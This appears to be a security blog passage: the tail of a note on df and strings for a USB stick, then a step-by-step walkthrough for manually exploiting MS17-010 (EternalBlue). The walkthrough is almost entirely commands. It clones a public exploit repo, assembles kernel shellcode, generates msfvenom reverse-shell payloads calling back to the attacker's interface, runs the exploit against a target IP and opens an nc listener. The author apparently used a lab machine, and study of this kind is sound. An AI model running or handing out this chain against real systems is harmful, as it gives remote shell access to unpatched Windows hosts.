df -lh

Df = Will report file system disk space usage
lh = local and print sizes in powers of 1024 Nice cheat sheet on these commands Link

Will show free disk space and lets focus on the /media/usbstick

You can use Strings to look for characters or you could have used cat as well.

Command:

strings /dev/sdb

Thanks for stopping by!

Manually Exploiting MS17-010 (python2 to python3)

Chris — Wed, 05 May 2021 16:52:32 +0000

This is a quick write-up on how to exploit MS17-10 after enumerating your victim machine.

I was trying to run Auto-Blue but with the switch from python2 to python3 I was hitting some hurdles. I read somewhere that you can run pyenv as a workaround but I needed this to work in a crunch. This was pulled from the root4loot blogpost and all thanks really goes to them on this one, check it out! Link

Step 1. Grab the code from https://github.com/worawit/MS17-010

Command:

git clone https://github.com/worawit/MS17-010

Step 2. Display the contents of the folder

Command:

ls -l MS17-010/shellcode/

Step 3. The next step in their walk-through is to assemble both the x64 and x86 shellcode then merge them below. You can get away with only doing 1 but if you dont know the arch then it could not work.

Assemble kernel shellcode with nasm.

Command:

nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin

Step 4. Now generate a binary payload with your LHOST and name it sc_x64_payload.bin.

Command:

msfvenom -p windows/x64/shell_reverse_tcp LPORT=443 LHOST=tun0 --platform windows -a x64 --format raw -o sc_x64_payload.bin

Step 5. Concentrate payload & shellcode

Command:

cat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bin

Step 6. Now assemble the kernel shellcode with nasm.

Command:

nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin

Step 7. Then generate a binary payload and label this one sc_x86_payload.bin

Command:

msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=tun0 --platform windows -a x86 --format raw -o sc_x86_payload.bin

Step 8. Concentrate payload and shellcode.

Command:

cat sc_x86_kernel.bin sc_x86_payload.bin > sc_x86.bin

Step 9. Now its time to merge them if that's what you would like to do. This will put them in the same binary and included in the eternalblue_sc_merge.py script.

Command:

python MS17-010/shellcode/eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin

Step 10. Now run the exploit. Just as a warning I had to run this multiple times to catch a shell and reverted my box as well.

Command:

python MS17-010/eternalblue_exploit7.py targetIP sc_all.bin

Command:

nc -nvlp 443